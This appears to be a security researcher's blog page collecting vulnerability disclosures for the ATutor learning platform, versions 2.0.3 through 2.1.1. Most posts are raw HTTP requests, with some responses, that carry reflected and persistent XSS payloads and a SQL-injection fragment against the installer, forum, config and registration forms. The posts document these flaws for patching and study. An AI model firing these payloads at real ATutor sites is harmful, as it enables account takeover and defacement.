Haunt IT: ATutor

Showing posts with label ATutor. Show all posts

Monday, 24 February 2014

[EN] ATutor 2.1.1 XSS

Last days I found few bugs in latest version of 2 popular webapplications. Both
you can find here but below you have detailed findings for latest ATutor (2.1.1).

# ==============================================================
# Title ...| ATutor Multiple vulnerabilities
# Version .| ATutor-2.1.1
# Date ....| 19.02.2014
# Found ...| HauntIT Blog
# Home ....| https://atutor.ca
# ==============================================================


# ==============================================================
# 1. During installation: xss and sql insertion:

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 191

action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
---<request>---


---<response>---
<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
---<response>---

--> tb_prefix and new_version parameter are also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 667

action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB

---<request>---

Vulnerable to XSS are also parameters:
step2%5Bnew_version%5D
step2%5Bdb_host%5D
step2%5Bdb_port%5D
step2%5Bdb_login%5D
step2%5Bdb_password%5D
step2%5Bdb_name%5D
step2%5Btb_prefix%5D


# ==============================================================
# 3. Persistent XSS (from admin)

---<request>---
POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 108

add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
---<request>---

---<response>---
<span class="required" title="Required Field">*</span><label for="title">Title</label><br />
    <input type="text" name="title" size="40" id="title" value="'>"><body/onload=alert(9999)>" />
  </div>
---<response>---



# ==============================================================
# 4. Edit config (from admin user):

---<request>---
POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 946

site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
---<request>---

If you have any questions, feel free to ask directly (via mail or comments).

Thanks ;)

Saturday, 22 February 2014

And here we go again ;)

In the "public" section here, you can find 2 more list to publication about
two webapplications tested last days: ILIAS and ATutor (in latest version of course).

If you have any questions, feel free to ask.
I will answer ASAP (as always;) ).

Cheers
o/

Tuesday, 18 December 2012

[EN] ATutor 2.1 vulnerabilities

Hi,

few findings at Atutor CMS .

I must say that Developers Team is really fast :)

Good job, thanks!

(Post will be updated as soon as dev-team will release the patch.)

* Update 20.12.2012 *
Today dev team send me information about patch.
Post will be updated as soon as possible.

o/

Thursday, 26 April 2012

[EN] ATutor 2.0.3 XSS

[ TITLE ....... ][ ATutor 2.0.3 XSS
[ DATE ........ ][ 14.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

[--------------------------------------------[
[ 3. Where is bug :)
................
hard copied from burp:
POST /www/NEW/atutor/ATutor/registration.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/www/NEW/atutor/ATutor/registration.php?register=Register

Cookie: ATutorID=ggobghtrr9dlt3d2qrsrjeej86; ea630b8e07331dfe8176df9908b196be=en-GB; PHPSESSID=rcqn6f0825bopcnfuthkb95la1; docebo_installer=qkel6srpbe1r44falthfgbloi7; docebo_session=au1hlm6k0dj1t72lvl88pdqt31; d5ff290df9b8ab6a17548bbbc48d21bc=903fb97e17f9a31fea5f97ee76a591bf

Content-Type: application/x-www-form-urlencoded

Content-Length: 1605

Connection: close

ml="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&password_error="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password_hidden=923956e1de909d796933df77360069ceaa3df747&registration_token=04bfd37055f6b1b81319dbc326165a78af8a2ba0&login="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e%2F**%2For%2F**%2F1%3D%271%27&form_password1="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&private_email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&first_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&second_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&last_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&year="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&month="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&day="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&gender="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&address="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&postal="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&city="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&province="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&country="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&phone="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&website="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&submit=+Save+

.........

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[